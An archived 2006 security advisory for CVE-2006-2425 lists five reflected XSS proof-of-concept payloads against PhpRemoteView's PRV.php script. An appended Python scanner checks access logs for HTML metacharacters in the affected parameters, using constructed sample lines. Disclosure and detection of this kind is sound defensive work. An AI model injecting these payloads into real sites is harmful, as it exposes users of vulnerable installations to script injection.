Bug: PhpRemoteView Multiple Xss Vulnerabilities ( Ascii Version )


Published: 2006.05.18
Credit: Soothackers
Risk: Low
CWE: N/A
CVE: CVE-2006-2425
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

---------------------------------------------

PhpRemoteView Multiple Xss Vulnerabilities

---------------------------------------------

Site:

http://php.spb.ru/remview/

Bug:

1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</script>

2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>

3- http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>

4- http://victim/path/PRV.php?c=d&d=[path]

MAKE DIR (type full path) : "><script>alert(/Soot/)</script>

5- http://victim/path/PRV.php?c=d&d=[path]

Full file name : "><script>alert(/Soot/)</script>

---------------------------------------------

Source :

http://soot.shabgard.org/bugs/phpremoteview.txt

Credit :

Soot

Shabgard Security Team

http://www.shabgard.org

Greetz :

Hregy,Elite,Bl2k,Littlehacker

---------------------------------------------
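
A log check for the reflected query parameters in items 1 to 3 (d, f, ref), added here as an example and not part of the original advisory or of PhpRemoteView. It assumes combined-format access logs and that the script is deployed under the name PRV.php as in the URLs above; the sample log lines and the /tools/ path are constructed. Items 4 and 5 are form fields and are not visible in a request line, so they are out of scope here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Query parameters the advisory shows being reflected (items 1-3).
REFLECTED_PARAMS = {"d", "f", "ref"}
# Characters needed to close an HTML attribute and open a new tag.
HTML_META = re.compile(r"[<>\"']")
# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target, script_name="PRV.php"):
    """Return sorted names of reflected parameters carrying HTML metacharacters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/" + script_name):  # script name is an assumption
        return []
    hits = set()
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in REFLECTED_PARAMS:
            continue
        for value in values:
            # parse_qs decodes once; decode a second time to catch double encoding.
            if HTML_META.search(value) or HTML_META.search(unquote_plus(value)):
                hits.add(name)
    return sorted(hits)

def scan(log_lines):
    """Return (line_number, parameter_names) for each log line worth reviewing."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            names = suspicious_params(match.group(1))
            if names:
                findings.append((number, names))
    return findings

# Constructed sample entries (documentation addresses, harmless <b> marker).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2006:10:00:00 +0000] "GET /tools/PRV.php?c=l&d=%2Fvar%2Fwww HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/May/2006:10:00:05 +0000] "GET /tools/PRV.php?c=l&d=%22%3E%3Cb%3E HTTP/1.1" 200 5201',
    '192.0.2.11 - - [18/May/2006:10:00:09 +0000] "GET /tools/PRV.php?c=setup&ref=%2522%253E%253Cb%253E HTTP/1.1" 200 4800',
    '192.0.2.12 - - [18/May/2006:10:00:12 +0000] "GET /index.php?d=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: HTML metacharacters in {', '.join(names)}")
```

A hit means the parameter value would need HTML-attribute encoding on output to be safe; file paths that legitimately contain quotes will also match and need manual review.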
